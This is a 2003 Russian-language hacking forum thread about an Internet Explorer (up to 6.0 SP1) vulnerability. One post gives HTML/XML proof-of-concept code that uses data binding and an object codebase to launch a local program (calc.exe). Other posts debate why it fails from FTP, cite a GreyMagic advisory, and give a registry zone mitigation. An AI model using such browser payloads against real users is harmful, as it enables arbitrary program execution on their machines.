Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | |
Ну блин, ну очевидно же 26.07.03 10:29 Число просмотров: 1617
Автор: whiletrue <Роман> Статус: Elderman
|
> Код с рабочего стола - это одна зона безопасности, из > локалки - другая, из интернета - третья! И не надо > говорить, что запуск этого самого кода с рабочего стола - > это дырка в IE!
Я смотрел не с рабочего стола, со ссылки!
http://www.compulenta.ru/addon/2002/3/5/26382/
|
<hacking>
|
Уязвимость ИЕ вплоть до 6.0 SP1 25.07.03 16:43
Автор: whiletrue <Роман> Статус: Elderman Отредактировано 26.07.03 11:03 Количество правок: 4
|
Существует весьма серьезная уязвимость в браузере Internet Explorer вплоть до 6.0 SP1. С её помощью на удаленной машине можно запустить любую программу, причем без использования скриптов и ActiveX.
Задействовать её можно с помощью следующего HTML-кода. Данный код, автоматически запустит калькулятор, если он лежит в c:/winnt/system32/calc.exe.
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
---
NAV - уязвимость знает.
По материалу Компьюленты 05.03.02
|
|
Ну, вобщем, если инфа не нравится... 26.07.03 10:27
Автор: whiletrue <Роман> Статус: Elderman
|
Да, че вы? Нашел я случайно эту инфу, выложил здесь, т.к. вроде речь об этом не шла, а иногда бывают вопросы - как запустить..., а вразумительных ответов я не видел...
Вобщем, если хотите, то я могу потереть ветку без лишних слов.
|
|
Уязвимость ИЕ вплоть до 6.0 SP1 25.07.03 16:47
Автор: Shturmfogell Статус: Member
|
я не понял почему нитка стёрлась, но у меня код с рабочего стола вроде запускает калькулятор, а вот выложив его на фтп и запустив эту страницу ни чего не произошло
|
| |
Ну блин, ну очевидно же 25.07.03 17:04
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
> я не понял почему нитка стёрлась, но у меня код с рабочего > стола вроде запускает калькулятор, а вот выложив его на фтп > и запустив эту страницу ни чего не произошло Код с рабочего стола - это одна зона безопасности, из локалки - другая, из интернета - третья! И не надо говорить, что запуск этого самого кода с рабочего стола - это дырка в IE!
|
| | |
Ну блин, ну очевидно же 26.07.03 10:29
Автор: whiletrue <Роман> Статус: Elderman
|
> Код с рабочего стола - это одна зона безопасности, из > локалки - другая, из интернета - третья! И не надо > говорить, что запуск этого самого кода с рабочего стола - > это дырка в IE!
Я смотрел не с рабочего стола, со ссылки!
http://www.compulenta.ru/addon/2002/3/5/26382/
|
| | |
Ну блин, ну очевидно же 25.07.03 17:06
Автор: Shturmfogell Статус: Member
|
> > я не понял почему нитка стёрлась, но у меня код с > рабочего > > стола вроде запускает калькулятор, а вот выложив его > на фтп > > и запустив эту страницу ни чего не произошло > Код с рабочего стола - это одна зона безопасности, из > локалки - другая, из интернета - третья! И не надо > говорить, что запуск этого самого кода с рабочего стола - > это дырка в IE! ты то прав про зоны, но у меня абсолютно все параметры enabled во всех зонах и все кукисы акцептид, но всё равно код не пашет
|
| | | |
Может заткнули все же... 25.07.03 17:12
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
Я скорее в адрес whiletrue это разъяснение писал :)
|
| | | | |
Может заткнули все же... 25.07.03 17:23
Автор: Shturmfogell Статус: Member
|
> Я скорее в адрес whiletrue это разъяснение писал :) хмм...ну это то понятно, хотя ни фига не понятно, но вот как же с кодом то быть - ты смог в итоге экслпоит заюзать или нет?
|
| | | | | |
Да, уже давно 25.07.03 17:35
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
Тот что на Компьюленте валялся, выдал у меня предупреждение про неподписанный компонент ActiveX. Когда я ему разрешил - он запустил калькулятор. Система была, если правильно помню, XP с непропатченным IE6.
|
| | | | | | |
будь добр 25.07.03 18:01
Автор: Shturmfogell Статус: Member Отредактировано 25.07.03 18:06 Количество правок: 1
|
закинь тут тот код, если он отличается от этого...так как у меня пока ни при каких обстоятельствах не пашет, а компьюдента молчит, показывая пустую страницу
|
| |
Уязвимость ИЕ вплоть до 6.0 SP1 25.07.03 16:52
Автор: whiletrue <Роман> Статус: Elderman Отредактировано 25.07.03 16:56 Количество правок: 2
|
> я не понял почему нитка стёрлась
Я ее потер и резюмировал. Зачем народу флейм читать?
|
| | |
Уязвимость ИЕ вплоть до 6.0 SP1 25.07.03 17:04
Автор: Shturmfogell Статус: Member
|
я к тому что я так и не увидел работу эксплойта в действии = он с фтп не грузит ни калькулятор ни чего другого - тока что пробовал
|
| | | |
Уязвимость действительно существут 25.07.03 23:18
Автор: DgtlScrm Статус: Member
|
Уязвимость действительно существует, и если вы хотите доказательств, вот они:
Reference: http://security.greymagic.com/adv/gm001-ie/
Example exploit: http://security.greymagic.com/adv/gm001-ie/advbind.asp
если я не ошибаюсь, нашли ее в феврале, и автор относительно ее существования не ошибается...
А тем у кого не получается, не беда... у других поучится ;)
Относительно патча, не знаю, но исправить все можно ручками. Для этого необходимо в реестре найти ключ интернет експлорера. Там есть настройка зон безопасности. Укажите для зоны "0" значение 3. (дефолтовое значение не помню и не спрашивайте =) )
DigitalScream resident `Security Level 5
|
| | | | |
<без заголовка> 26.07.03 02:15
Автор: Shturmfogell Статус: Member Отредактировано 26.07.03 03:57 Количество правок: 1
|
> Уязвимость действительно существует, и если вы хотите > доказательств, вот они: > Reference: http://security.greymagic.com/adv/gm001-ie/ > Example exploit: > http://security.greymagic.com/adv/gm001-ie/advbind.asp > > если я не ошибаюсь, нашли ее в феврале, и автор > относительно ее существования не ошибается... > > А тем у кого не получается, не беда... у других поучится ;) > Относительно патча, не знаю, но исправить все можно > ручками. Для этого необходимо в реестре найти ключ интернет > експлорера. Там есть настройка зон безопасности. Укажите > для зоны "0" значение 3. (дефолтовое значение не помню и не > спрашивайте =) )
> DigitalScream resident `Security Level 5
это конечно очень познавательно. но предыдущие 5 ниток разве не о том же говорили ?!.....
|
| | | | | |
Я так понял, что на человека грузят... 26.07.03 04:36
Автор: DgtlScrm Статус: Member
|
> это конечно очень познавательно. но предыдущие 5 ниток > разве не о том же говорили ?!.....
я посмотрел первые ответы и так понял, что на человека грузят, "Мол че за фигня? Не работает!" Вот я и решил, восстановить поврежденные класте... ой, в смысле, справедливость =)
Но темнеменее, я щитаю выложенная информаци не оказалась лишней.
DigitalScream resident 'Security Level 5'
|
| | | | | | |
Я так понял, что на человека грузят... 26.07.03 12:15
Автор: Shturmfogell Статус: Member
|
ну а если с дигитального языка перевесити на русский, то получится что что не на грузчика грузят, а человека грузят =)) но ЦифровомуКрику прощается :))
|
|
|